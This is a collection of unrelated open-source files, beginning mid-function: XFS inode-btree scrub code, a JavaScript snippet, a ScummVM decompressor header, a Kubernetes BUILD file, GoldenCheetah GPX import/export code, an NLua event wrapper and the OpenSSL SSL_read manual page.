xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); if (!xfs_scrub_iallocbt_chunk(bs, &irec, agino, len)) goto out; goto check_freemask; } /* Check each chunk of a sparse inode cluster. 
*/ holemask = irec.ir_holemask; holecount = 0; len = XFS_B_TO_FSB(mp, XFS_INODES_PER_HOLEMASK_BIT * mp->m_sb.sb_inodesize); holes = ~xfs_inobt_irec_to_allocmask(&irec); if ((holes & irec.ir_free) != holes || irec.ir_freecount > irec.ir_count) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); for (i = 0; i < XFS_INOBT_HOLEMASK_BITS; i++) { if (holemask & 1) holecount += XFS_INODES_PER_HOLEMASK_BIT; else if (!xfs_scrub_iallocbt_chunk(bs, &irec, agino, len)) break; holemask >>= 1; agino += XFS_INODES_PER_HOLEMASK_BIT; } if (holecount > XFS_INODES_PER_CHUNK || holecount + irec.ir_count != XFS_INODES_PER_CHUNK) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); check_freemask: error = xfs_scrub_iallocbt_check_freemask(bs, &irec); if (error) goto out; out: return error; } /* * Make sure the inode btrees are as large as the rmap thinks they are. * Don't bother if we're missing btree cursors, as we're already corrupt. */ STATIC void xfs_scrub_iallocbt_xref_rmap_btreeblks( struct xfs_scrub_context *sc, int which) { struct xfs_owner_info oinfo; xfs_filblks_t blocks; xfs_extlen_t inobt_blocks = 0; xfs_extlen_t finobt_blocks = 0; int error; if (!sc->sa.ino_cur || !sc->sa.rmap_cur || (xfs_sb_version_hasfinobt(&sc->mp->m_sb) && !sc->sa.fino_cur) || xfs_scrub_skip_xref(sc->sm)) return; /* Check that we saw as many inobt blocks as the rmap says. 
*/ error = xfs_btree_count_blocks(sc->sa.ino_cur, &inobt_blocks); if (!xfs_scrub_process_error(sc, 0, 0, &error)) return; if (sc->sa.fino_cur) { error = xfs_btree_count_blocks(sc->sa.fino_cur, &finobt_blocks); if (!xfs_scrub_process_error(sc, 0, 0, &error)) return; } xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INOBT); error = xfs_scrub_count_rmap_ownedby_ag(sc, sc->sa.rmap_cur, &oinfo, &blocks); if (!xfs_scrub_should_check_xref(sc, &error, &sc->sa.rmap_cur)) return; if (blocks != inobt_blocks + finobt_blocks) xfs_scrub_btree_set_corrupt(sc, sc->sa.ino_cur, 0); } /* * Make sure that the inobt records point to the same number of blocks as * the rmap says are owned by inodes. */ STATIC void xfs_scrub_iallocbt_xref_rmap_inodes( struct xfs_scrub_context *sc, int which, xfs_filblks_t inode_blocks) { struct xfs_owner_info oinfo; xfs_filblks_t blocks; int error; if (!sc->sa.rmap_cur || xfs_scrub_skip_xref(sc->sm)) return; /* Check that we saw as many inode blocks as the rmap knows about. */ xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INODES); error = xfs_scrub_count_rmap_ownedby_ag(sc, sc->sa.rmap_cur, &oinfo, &blocks); if (!xfs_scrub_should_check_xref(sc, &error, &sc->sa.rmap_cur)) return; if (blocks != inode_blocks) xfs_scrub_btree_xref_set_corrupt(sc, sc->sa.rmap_cur, 0); } /* Scrub the inode btrees for some AG. */ STATIC int xfs_scrub_iallocbt( struct xfs_scrub_context *sc, xfs_btnum_t which) { struct xfs_btree_cur *cur; struct xfs_owner_info oinfo; xfs_filblks_t inode_blocks = 0; int error; xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INOBT); cur = which == XFS_BTNUM_INO ? sc->sa.ino_cur : sc->sa.fino_cur; error = xfs_scrub_btree(sc, cur, xfs_scrub_iallocbt_rec, &oinfo, &inode_blocks); if (error) return error; xfs_scrub_iallocbt_xref_rmap_btreeblks(sc, which); /* * If we're scrubbing the inode btree, inode_blocks is the number of * blocks pointed to by all the inode chunk records. Therefore, we * should compare to the number of inode chunk blocks that the rmap * knows about. 
We can't do this for the finobt since it only points * to inode chunks with free inodes. */ if (which == XFS_BTNUM_INO) xfs_scrub_iallocbt_xref_rmap_inodes(sc, which, inode_blocks); return error; } int xfs_scrub_inobt( struct xfs_scrub_context *sc) { return xfs_scrub_iallocbt(sc, XFS_BTNUM_INO); } int xfs_scrub_finobt( struct xfs_scrub_context *sc) { return xfs_scrub_iallocbt(sc, XFS_BTNUM_FINO); } /* See if an inode btree has (or doesn't have) an inode chunk record. */ static inline void xfs_scrub_xref_inode_check( struct xfs_scrub_context *sc, xfs_agblock_t agbno, xfs_extlen_t len, struct xfs_btree_cur **icur, bool should_have_inodes) { bool has_inodes; int error; if (!(*icur) || xfs_scrub_skip_xref(sc->sm)) return; error = xfs_ialloc_has_inodes_at_extent(*icur, agbno, len, &has_inodes); if (!xfs_scrub_should_check_xref(sc, &error, icur)) return; if (has_inodes != should_have_inodes) xfs_scrub_btree_xref_set_corrupt(sc, *icur, 0); } /* xref check that the extent is not covered by inodes */ void xfs_scrub_xref_is_not_inode_chunk( struct xfs_scrub_context *sc, xfs_agblock_t agbno, xfs_extlen_t len) { xfs_scrub_xref_inode_check(sc, agbno, len, &sc->sa.ino_cur, false); xfs_scrub_xref_inode_check(sc, agbno, len, &sc->sa.fino_cur, false); } /* xref check that the extent is covered by inodes */ void xfs_scrub_xref_is_inode_chunk( struct xfs_scrub_context *sc, xfs_agblock_t agbno, xfs_extlen_t len) { xfs_scrub_xref_inode_check(sc, agbno, len, &sc->sa.ino_cur, true); }
{ "pile_set_name": "Github" }
!function(){var i=0;with(obj){i+=i+=10}}()
{ "pile_set_name": "Github" }
/* ScummVM - Graphic Adventure Engine * * ScummVM is the legal property of its developers, whose names * are too numerous to list here. Please refer to the COPYRIGHT * file distributed with this source distribution. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * */ #ifndef MADE_REDREADER_H #define MADE_REDREADER_H #include "common/scummsys.h" namespace Common { class SeekableReadStream; class File; } namespace Made { class RedReader { public: Common::SeekableReadStream *load(const char *redFilename, const char *filename); static Common::SeekableReadStream *loadFromRed(const char *redFilename, const char *filename); private: struct FileEntry { uint32 compSize, origSize; }; bool seekFile(Common::File &fd, FileEntry &fileEntry, const char *filename); }; const uint BITBUFSIZ = 16; const uint DICBIT = 13; const uint DICSIZ = 1 << DICBIT; const uint MATCHBIT = 8; const uint MAXMATCH = 256; const uint THRESHOLD = 3; const uint NC = 255 + MAXMATCH + 2 - THRESHOLD; const uint CBIT = 9; const uint CODE_BIT = 16; const uint NP = DICBIT + 1; const int NT = CODE_BIT + 3; const uint PBIT = 4; const uint TBIT = 5; const uint NPT = NT; class LzhDecompressor { public: LzhDecompressor(); ~LzhDecompressor(); int decompress(Common::SeekableReadStream &source, byte *dest, uint32 compSize, uint32 origSize); private: 
Common::SeekableReadStream *_source; uint32 _compSize, _blockPos; uint16 _bitbuf; uint _subbitbuf; int _bitcount; uint16 _left[2 * NC - 1], _right[2 * NC - 1]; byte _c_len[NC], _pt_len[NPT]; uint _blocksize; uint16 _c_table[4096], _pt_table[256]; int tree_n, heapsize; short heap[NC + 1]; uint16 *freq, *sortptr, len_cnt[17]; byte *len_table; int decode_i, decode_j; int count_len_depth; byte readByte(); void fillbuf(int count); uint getbits(int count); void init_getbits(); void decode_start(); void decode(uint count, byte text[]); void huf_decode_start(); unsigned int decode_c(); unsigned int decode_p(); void read_pt_len(int nn, int nbit, int i_special); void read_c_len(); void count_len(int i); void make_len(int root); void downheap(int i); void make_code(int n, byte len[], uint16 code[]); void make_table(uint nchar, byte bitlen[], uint tablebits, uint16 table[]); int make_tree(int nparm, uint16 freqparm[], byte lenparm[], uint16 codeparm[]); }; } // End of namespace Made #endif /* MADE_H */
{ "pile_set_name": "Github" }
package(default_visibility = ["//visibility:public"]) load( "@io_bazel_rules_go//go:def.bzl", "go_library", "go_test", ) go_test( name = "go_default_test", srcs = ["storage_test.go"], embed = [":go_default_library"], deps = [ "//pkg/apis/autoscaling:go_default_library", "//pkg/apis/core:go_default_library", "//pkg/registry/registrytest:go_default_library", "//vendor/k8s.io/apimachinery/pkg/api/equality:go_default_library", "//vendor/k8s.io/apimachinery/pkg/api/errors:go_default_library", "//vendor/k8s.io/apimachinery/pkg/apis/meta/v1:go_default_library", "//vendor/k8s.io/apimachinery/pkg/fields:go_default_library", "//vendor/k8s.io/apimachinery/pkg/labels:go_default_library", "//vendor/k8s.io/apimachinery/pkg/runtime:go_default_library", "//vendor/k8s.io/apimachinery/pkg/util/diff:go_default_library", "//vendor/k8s.io/apiserver/pkg/endpoints/request:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic/testing:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/rest:go_default_library", "//vendor/k8s.io/apiserver/pkg/storage/etcd/testing:go_default_library", ], ) go_library( name = "go_default_library", srcs = ["storage.go"], importpath = "k8s.io/kubernetes/pkg/registry/core/replicationcontroller/storage", deps = [ "//pkg/apis/autoscaling:go_default_library", "//pkg/apis/autoscaling/v1:go_default_library", "//pkg/apis/autoscaling/validation:go_default_library", "//pkg/apis/core:go_default_library", "//pkg/apis/extensions/v1beta1:go_default_library", "//pkg/printers:go_default_library", "//pkg/printers/internalversion:go_default_library", "//pkg/printers/storage:go_default_library", "//pkg/registry/core/replicationcontroller:go_default_library", "//vendor/k8s.io/apimachinery/pkg/api/errors:go_default_library", "//vendor/k8s.io/apimachinery/pkg/apis/meta/v1:go_default_library", "//vendor/k8s.io/apimachinery/pkg/labels:go_default_library", 
"//vendor/k8s.io/apimachinery/pkg/runtime:go_default_library", "//vendor/k8s.io/apimachinery/pkg/runtime/schema:go_default_library", "//vendor/k8s.io/apiserver/pkg/endpoints/request:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic/registry:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/rest:go_default_library", ], ) filegroup( name = "package-srcs", srcs = glob(["**"]), tags = ["automanaged"], visibility = ["//visibility:private"], ) filegroup( name = "all-srcs", srcs = [":package-srcs"], tags = ["automanaged"], )
{ "pile_set_name": "Github" }
/* * Copyright (c) 2010 Greg Lonnon ([email protected]) copied from TcxRideFile.cpp * * Copyright (c) 2008 Sean C. Rhea ([email protected]), * J.T Conklin ([email protected]) * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., 51 * Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ #include "GpxRideFile.h" #include "GpxParser.h" #include "GcUpgrade.h" #include <QDomDocument> static int gpxFileReaderRegistered = RideFileFactory::instance().registerReader( "gpx", "GPS Exchange format", new GpxFileReader()); RideFile *GpxFileReader::openRideFile(QFile &file, QStringList &errors, QList<RideFile*>*) const { (void) errors; RideFile *rideFile = new RideFile(); rideFile->setRecIntSecs(1.0); //rideFile->setDeviceType("GPS Exchange Format"); rideFile->setFileFormat("GPS Exchange Format (gpx)"); GpxParser handler(rideFile); QXmlInputSource source (&file); QXmlSimpleReader reader; reader.setContentHandler (&handler); reader.parse (source); return rideFile; } QByteArray GpxFileReader::toByteArray(Context *, const RideFile *ride, bool withAlt, bool withWatts, bool withHr, bool withCad) const { // // GPX Standard defined here: http://www.topografix.com/GPX/1/1/ // QDomDocument doc; QDomProcessingInstruction hdr = doc.createProcessingInstruction("xml","version=\"1.0\""); doc.appendChild(hdr); QDomElement gpx = doc.createElementNS("http://www.topografix.com/GPX/1/1", "gpx"); 
gpx.setAttribute("xmlns:xsi", "http://www.w3.org/2001/XMLSchema-instance"); gpx.setAttribute("xmlns:gpxtpx", "http://www.garmin.com/xmlschemas/TrackPointExtension/v1"); gpx.setAttribute("xmlns:gpxpx", "http://www.garmin.com/xmlschemas/PowerExtension/v1"); gpx.setAttribute("xsi:schemaLocation", "http://www.topografix.com/GPX/1/1" " " "http://www.topografix.com/GPX/1/1/gpx.xsd" " " "http://www.garmin.com/xmlschemas/TrackPointExtension/v1" " " "http://www.garmin.com/xmlschemas/TrackPointExtensionv1.xsd" " " "http://www.garmin.com/xmlschemas/PowerExtension/v1" " " "http://www.garmin.com/xmlschemas/PowerExtensionv1.xsd" ); gpx.setAttribute("version", "1.1"); gpx.setAttribute("creator", QString("GoldenCheetah (build %1)").arg(VERSION_LATEST)); doc.appendChild(gpx); // If we have data points, we'll have a <trk> and in that a <trkseg> and in that a bunch of <trkpt> if (!ride->dataPoints().empty()) { QDomElement trk = doc.createElement("trk"); gpx.appendChild(trk); QDomElement trkseg = doc.createElement("trkseg"); trk.appendChild(trkseg); QLocale cLocale(QLocale::Language::C); foreach (const RideFilePoint *point, ride->dataPoints()) { QDomElement trkpt = doc.createElement("trkpt"); trkseg.appendChild(trkpt); QString strLat = cLocale.toString(point->lat, 'g', 12); trkpt.setAttribute("lat", strLat); QString strLon = cLocale.toString(point->lon, 'g', 12); trkpt.setAttribute("lon", strLon); // GPX standard requires <ele>, if present, to be first if (withAlt && ride->areDataPresent()->alt) { QDomElement ele = doc.createElement("ele"); //QDomText text = doc.createTextNode(QString("%1").arg(point->alt, 0, 'f', 1)); //ele.appendChild(text); ele.appendChild(doc.createTextNode(QString("%1").arg(point->alt, 0, 'f', 1))); trkpt.appendChild(ele); } // GPX standard requires <time>, if present, to come next if (ride->areDataPresent()->secs && point->secs >= 0) { QDomElement tm = doc.createElement("time"); QDomText text = 
doc.createTextNode(ride->startTime().toUTC().addSecs(point->secs).toString(Qt::ISODate)); tm.appendChild(text); trkpt.appendChild(tm); } // Extra things, if any, need to go into an <extensions> tag QDomElement gpxtpx_atemp; // temperature QDomElement gpxtpx_hr; // HR QDomElement gpxtpx_cad; // cadance QDomElement pwr_PowerInWatts; // power if (ride->areDataPresent()->temp && point->temp > -200) { gpxtpx_atemp = doc.createElement("gpxtpx:atemp"); gpxtpx_atemp.appendChild(doc.createTextNode(QString("%1").arg(point->temp, 0, 'f', 1))); } if (withHr && ride->areDataPresent()->hr) { gpxtpx_hr = doc.createElement("gpxtpx:hr"); gpxtpx_hr.appendChild(doc.createTextNode(QString("%1").arg(point->hr, 0, 'f', 0))); } if (withCad && ride->areDataPresent()->cad && point->cad < 255) { gpxtpx_cad = doc.createElement("gpxtpx:cad"); gpxtpx_cad.appendChild(doc.createTextNode(QString("%1").arg(point->cad, 0, 'f', 0))); } if (withWatts && ride->areDataPresent()->watts) { pwr_PowerInWatts = doc.createElement("pwr:PowerInWatts"); pwr_PowerInWatts.setAttribute("xmlns:pwr", "http://www.garmin.com/xmlschemas/PowerExtension/v1"); pwr_PowerInWatts.appendChild(doc.createTextNode(QString("%1").arg(point->watts, 0, 'f', 0))); } // If we have at least one from among TEMP, CAD, and HR, we need a <gpxtpx:TrackPointExtension> tag QDomElement gpxtpx_TrackPointExtension; if (!gpxtpx_atemp.isNull() || !gpxtpx_cad.isNull() || !gpxtpx_hr.isNull()) { gpxtpx_TrackPointExtension = doc.createElement("gpxtpx:TrackPointExtension"); // These must go in this order, as per http://www8.garmin.com/xmlschemas/TrackPointExtensionv1.xsd if (!gpxtpx_atemp.isNull()) gpxtpx_TrackPointExtension.appendChild(gpxtpx_atemp); if (!gpxtpx_hr.isNull()) gpxtpx_TrackPointExtension.appendChild(gpxtpx_hr); if (!gpxtpx_cad.isNull()) gpxtpx_TrackPointExtension.appendChild(gpxtpx_cad); } // If we have gpxtpx_TrackPointExtension and/or pwr_PowerInWatts, we need an <extension> tag to hold them. if (! 
gpxtpx_TrackPointExtension.isNull() || !pwr_PowerInWatts.isNull()) { QDomElement extensions = doc.createElement("extensions"); trkpt.appendChild(extensions); if (! gpxtpx_TrackPointExtension.isNull()) extensions.appendChild(gpxtpx_TrackPointExtension); if (!pwr_PowerInWatts.isNull()) extensions.appendChild(pwr_PowerInWatts); } } } return doc.toByteArray(4); } bool GpxFileReader::writeRideFile(Context *context, const RideFile *ride, QFile &file) const { QByteArray xml = toByteArray(context, ride, true, true, true, true); if (!file.open(QIODevice::WriteOnly)) return(false); file.resize(0); QTextStream out(&file); out.setCodec("UTF-8"); //out.setGenerateByteOrderMark(true); out << xml; out.flush(); file.close(); return(true); }
{ "pile_set_name": "Github" }
/* * This file is part of NLua. * * Copyright (C) 2003-2005 Fabio Mascarenhas de Queiroz. * Copyright (C) 2012 Megax <http://megax.yeahunter.hu/> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ using System; using System.Reflection; namespace NLua.Method { /* * Wrapper class for events that does registration/deregistration * of event handlers. 
* * Author: Fabio Mascarenhas * Version: 1.0 */ class RegisterEventHandler { private EventHandlerContainer pendingEvents; private EventInfo eventInfo; private object target; public RegisterEventHandler (EventHandlerContainer pendingEvents, object target, EventInfo eventInfo) { this.target = target; this.eventInfo = eventInfo; this.pendingEvents = pendingEvents; } /* * Adds a new event handler */ public Delegate Add (LuaFunction function) { //CP: Fix by Ben Bryant for event handling with one parameter //link: http://luaforge.net/forum/message.php?msg_id=9266 Delegate handlerDelegate = CodeGeneration.Instance.GetDelegate (eventInfo.EventHandlerType, function); eventInfo.AddEventHandler (target, handlerDelegate); pendingEvents.Add (handlerDelegate, this); return handlerDelegate; } /* * Removes an existing event handler */ public void Remove (Delegate handlerDelegate) { RemovePending (handlerDelegate); pendingEvents.Remove (handlerDelegate); } /* * Removes an existing event handler (without updating the pending handlers list) */ internal void RemovePending (Delegate handlerDelegate) { eventInfo.RemoveEventHandler (target, handlerDelegate); } } }
{ "pile_set_name": "Github" }
.\" Automatically generated by Pod::Man 4.14 (Pod::Simple 3.40) .\" .\" Standard preamble: .\" ======================================================================== .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Vb \" Begin verbatim text .ft CW .nf .ne \\$1 .. .de Ve \" End verbatim text .ft R .fi .. .\" Set up some character translations and predefined strings. \*(-- will .\" give an unbreakable dash, \*(PI will give pi, \*(L" will give a left .\" double quote, and \*(R" will give a right double quote. \*(C+ will .\" give a nicer C++. Capital omega is used to do unbreakable dashes and .\" therefore won't be available. \*(C` and \*(C' expand to `' in nroff, .\" nothing in troff, for use with C<>. .tr \(*W- .ds C+ C\v'-.1v'\h'-1p'\s-2+\h'-1p'+\s0\v'.1v'\h'-1p' .ie n \{\ . ds -- \(*W- . ds PI pi . if (\n(.H=4u)&(1m=24u) .ds -- \(*W\h'-12u'\(*W\h'-12u'-\" diablo 10 pitch . if (\n(.H=4u)&(1m=20u) .ds -- \(*W\h'-12u'\(*W\h'-8u'-\" diablo 12 pitch . ds L" "" . ds R" "" . ds C` "" . ds C' "" 'br\} .el\{\ . ds -- \|\(em\| . ds PI \(*p . ds L" `` . ds R" '' . ds C` . ds C' 'br\} .\" .\" Escape single quotes in literal strings from groff's Unicode transform. .ie \n(.g .ds Aq \(aq .el .ds Aq ' .\" .\" If the F register is >0, we'll generate index entries on stderr for .\" titles (.TH), headers (.SH), subsections (.SS), items (.Ip), and index .\" entries marked with X<> in POD. Of course, you'll have to process the .\" output yourself in some meaningful fashion. .\" .\" Avoid warning from groff about undefined register 'F'. .de IX .. .nr rF 0 .if \n(.g .if rF .nr rF 1 .if (\n(rF:(\n(.g==0)) \{\ . if \nF \{\ . de IX . tm Index:\\$1\t\\n%\t"\\$2" .. . if !\nF==2 \{\ . nr % 0 . nr F 2 . \} . \} .\} .rr rF .\" .\" Accent mark definitions (@(#)ms.acc 1.5 88/02/08 SMI; from UCB 4.2). .\" Fear. Run. Save yourself. No user-serviceable parts. . \" fudge factors for nroff and troff .if n \{\ . ds #H 0 . ds #V .8m . ds #F .3m . ds #[ \f1 . 
ds #] \fP .\} .if t \{\ . ds #H ((1u-(\\\\n(.fu%2u))*.13m) . ds #V .6m . ds #F 0 . ds #[ \& . ds #] \& .\} . \" simple accents for nroff and troff .if n \{\ . ds ' \& . ds ` \& . ds ^ \& . ds , \& . ds ~ ~ . ds / .\} .if t \{\ . ds ' \\k:\h'-(\\n(.wu*8/10-\*(#H)'\'\h"|\\n:u" . ds ` \\k:\h'-(\\n(.wu*8/10-\*(#H)'\`\h'|\\n:u' . ds ^ \\k:\h'-(\\n(.wu*10/11-\*(#H)'^\h'|\\n:u' . ds , \\k:\h'-(\\n(.wu*8/10)',\h'|\\n:u' . ds ~ \\k:\h'-(\\n(.wu-\*(#H-.1m)'~\h'|\\n:u' . ds / \\k:\h'-(\\n(.wu*8/10-\*(#H)'\z\(sl\h'|\\n:u' .\} . \" troff and (daisy-wheel) nroff accents .ds : \\k:\h'-(\\n(.wu*8/10-\*(#H+.1m+\*(#F)'\v'-\*(#V'\z.\h'.2m+\*(#F'.\h'|\\n:u'\v'\*(#V' .ds 8 \h'\*(#H'\(*b\h'-\*(#H' .ds o \\k:\h'-(\\n(.wu+\w'\(de'u-\*(#H)/2u'\v'-.3n'\*(#[\z\(de\v'.3n'\h'|\\n:u'\*(#] .ds d- \h'\*(#H'\(pd\h'-\w'~'u'\v'-.25m'\f2\(hy\fP\v'.25m'\h'-\*(#H' .ds D- D\\k:\h'-\w'D'u'\v'-.11m'\z\(hy\v'.11m'\h'|\\n:u' .ds th \*(#[\v'.3m'\s+1I\s-1\v'-.3m'\h'-(\w'I'u*2/3)'\s-1o\s+1\*(#] .ds Th \*(#[\s+2I\s-2\h'-\w'I'u*3/5'\v'-.3m'o\v'.3m'\*(#] .ds ae a\h'-(\w'a'u*4/10)'e .ds Ae A\h'-(\w'A'u*4/10)'E . \" corrections for vroff .if v .ds ~ \\k:\h'-(\\n(.wu*9/10-\*(#H)'\s-2\u~\d\s+2\h'|\\n:u' .if v .ds ^ \\k:\h'-(\\n(.wu*10/11-\*(#H)'\v'-.4m'^\v'.4m'\h'|\\n:u' . \" for low resolution devices (crt and lpr) .if \n(.H>23 .if \n(.V>19 \ \{\ . ds : e . ds 8 ss . ds o a . ds d- d\h'-1'\(ga . ds D- D\h'-1'\(hy . ds th \o'bp' . ds Th \o'LP' . ds ae ae . ds Ae AE .\} .rm #[ #] #H #V #F C .\" ======================================================================== .\" .IX Title "SSL_READ 3" .TH SSL_READ 3 "2020-09-22" "1.1.1h" "OpenSSL" .\" For nroff, turn off justification. Always turn off hyphenation; it makes .\" way too many mistakes in technical documents. 
.if n .ad l .nh .SH "NAME" SSL_read_ex, SSL_read, SSL_peek_ex, SSL_peek \&\- read bytes from a TLS/SSL connection .SH "SYNOPSIS" .IX Header "SYNOPSIS" .Vb 1 \& #include <openssl/ssl.h> \& \& int SSL_read_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); \& int SSL_read(SSL *ssl, void *buf, int num); \& \& int SSL_peek_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); \& int SSL_peek(SSL *ssl, void *buf, int num); .Ve .SH "DESCRIPTION" .IX Header "DESCRIPTION" \&\fBSSL_read_ex()\fR and \fBSSL_read()\fR try to read \fBnum\fR bytes from the specified \fBssl\fR into the buffer \fBbuf\fR. On success \fBSSL_read_ex()\fR will store the number of bytes actually read in \fB*readbytes\fR. .PP \&\fBSSL_peek_ex()\fR and \fBSSL_peek()\fR are identical to \fBSSL_read_ex()\fR and \fBSSL_read()\fR respectively except no bytes are actually removed from the underlying \s-1BIO\s0 during the read, so that a subsequent call to \fBSSL_read_ex()\fR or \fBSSL_read()\fR will yield at least the same bytes. .SH "NOTES" .IX Header "NOTES" In the paragraphs below a \*(L"read function\*(R" is defined as one of \fBSSL_read_ex()\fR, \&\fBSSL_read()\fR, \fBSSL_peek_ex()\fR or \fBSSL_peek()\fR. .PP If necessary, a read function will negotiate a \s-1TLS/SSL\s0 session, if not already explicitly performed by \fBSSL_connect\fR\|(3) or \fBSSL_accept\fR\|(3). If the peer requests a re-negotiation, it will be performed transparently during the read function operation. The behaviour of the read functions depends on the underlying \s-1BIO.\s0 .PP For the transparent negotiation to succeed, the \fBssl\fR must have been initialized to client or server mode. This is being done by calling \&\fBSSL_set_connect_state\fR\|(3) or \fBSSL_set_accept_state()\fR before the first invocation of a read function. .PP The read functions work based on the \s-1SSL/TLS\s0 records. The data are received in records (with a maximum record size of 16kB). 
Only when a record has been completely received, can it be processed (decryption and check of integrity). Therefore, data that was not retrieved at the last read call can still be buffered inside the \s-1SSL\s0 layer and will be retrieved on the next read call. If \fBnum\fR is higher than the number of bytes buffered then the read functions will return with the bytes buffered. If no more bytes are in the buffer, the read functions will trigger the processing of the next record. Only when the record has been received and processed completely will the read functions return reporting success. At most the contents of one record will be returned. As the size of an \s-1SSL/TLS\s0 record may exceed the maximum packet size of the underlying transport (e.g. \s-1TCP\s0), it may be necessary to read several packets from the transport layer before the record is complete and the read call can succeed. .PP If \fB\s-1SSL_MODE_AUTO_RETRY\s0\fR has been switched off and a non-application data record has been processed, the read function can return and set the error to \&\fB\s-1SSL_ERROR_WANT_READ\s0\fR. In this case there might still be unprocessed data available in the \fB\s-1BIO\s0\fR. If read ahead was set using \fBSSL_CTX_set_read_ahead\fR\|(3), there might also still be unprocessed data available in the \fB\s-1SSL\s0\fR. This behaviour can be controlled using the \fBSSL_CTX_set_mode\fR\|(3) call. .PP If the underlying \s-1BIO\s0 is \fBblocking\fR, a read function will only return once the read operation has been finished or an error occurred, except when a non-application data record has been processed and \fB\s-1SSL_MODE_AUTO_RETRY\s0\fR is not set. Note that if \fB\s-1SSL_MODE_AUTO_RETRY\s0\fR is set and only non-application data is available the call will hang. .PP If the underlying \s-1BIO\s0 is \fBnonblocking\fR, a read function will also return when the underlying \s-1BIO\s0 could not satisfy the needs of the function to continue the operation. 
In this case a call to \fBSSL_get_error\fR\|(3) with the return value of the read function will yield \fB\s-1SSL_ERROR_WANT_READ\s0\fR or \&\fB\s-1SSL_ERROR_WANT_WRITE\s0\fR. As at any time it's possible that non-application data needs to be sent, a read function can also cause write operations. The calling process then must repeat the call after taking appropriate action to satisfy the needs of the read function. The action depends on the underlying \s-1BIO.\s0 When using a nonblocking socket, nothing is to be done, but \fBselect()\fR can be used to check for the required condition. When using a buffering \s-1BIO,\s0 like a \s-1BIO\s0 pair, data must be written into or retrieved out of the \s-1BIO\s0 before being able to continue. .PP \&\fBSSL_pending\fR\|(3) can be used to find out whether there are buffered bytes available for immediate retrieval. In this case the read function can be called without blocking or actually receiving new data from the underlying socket. .SH "RETURN VALUES" .IX Header "RETURN VALUES" \&\fBSSL_read_ex()\fR and \fBSSL_peek_ex()\fR will return 1 for success or 0 for failure. Success means that 1 or more application data bytes have been read from the \s-1SSL\s0 connection. Failure means that no bytes could be read from the \s-1SSL\s0 connection. Failures can be retryable (e.g. we are waiting for more bytes to be delivered by the network) or non-retryable (e.g. a fatal network error). In the event of a failure call \fBSSL_get_error\fR\|(3) to find out the reason which indicates whether the call is retryable or not. .PP For \fBSSL_read()\fR and \fBSSL_peek()\fR the following return values can occur: .IP "> 0" 4 .IX Item "> 0" The read operation was successful. The return value is the number of bytes actually read from the \s-1TLS/SSL\s0 connection. .IP "<= 0" 4 .IX Item "<= 0" The read operation was not successful, because either the connection was closed, an error occurred or action must be taken by the calling process. 
Call \fBSSL_get_error\fR\|(3) with the return value \fBret\fR to find out the reason.
.Sp
Old documentation indicated a difference between 0 and \-1, and that \-1 was
retryable.
You should instead call \fBSSL_get_error()\fR to find out if it's retryable.
.SH "SEE ALSO"
.IX Header "SEE ALSO"
\&\fBSSL_get_error\fR\|(3), \fBSSL_write_ex\fR\|(3),
\&\fBSSL_CTX_set_mode\fR\|(3), \fBSSL_CTX_new\fR\|(3),
\&\fBSSL_connect\fR\|(3), \fBSSL_accept\fR\|(3),
\&\fBSSL_set_connect_state\fR\|(3),
\&\fBSSL_pending\fR\|(3),
\&\fBSSL_shutdown\fR\|(3), \fBSSL_set_shutdown\fR\|(3),
\&\fBssl\fR\|(7), \fBbio\fR\|(7)
.SH "HISTORY"
.IX Header "HISTORY"
The \fBSSL_read_ex()\fR and \fBSSL_peek_ex()\fR functions were added in OpenSSL 1.1.1.
.SH "COPYRIGHT"
.IX Header "COPYRIGHT"
Copyright 2000\-2020 The OpenSSL Project Authors. All Rights Reserved.
.PP
Licensed under the OpenSSL license (the \*(L"License\*(R").  You may not use
this file except in compliance with the License.  You can obtain a copy
in the file \s-1LICENSE\s0 in the source distribution or at
<https://www.openssl.org/source/license.html>.
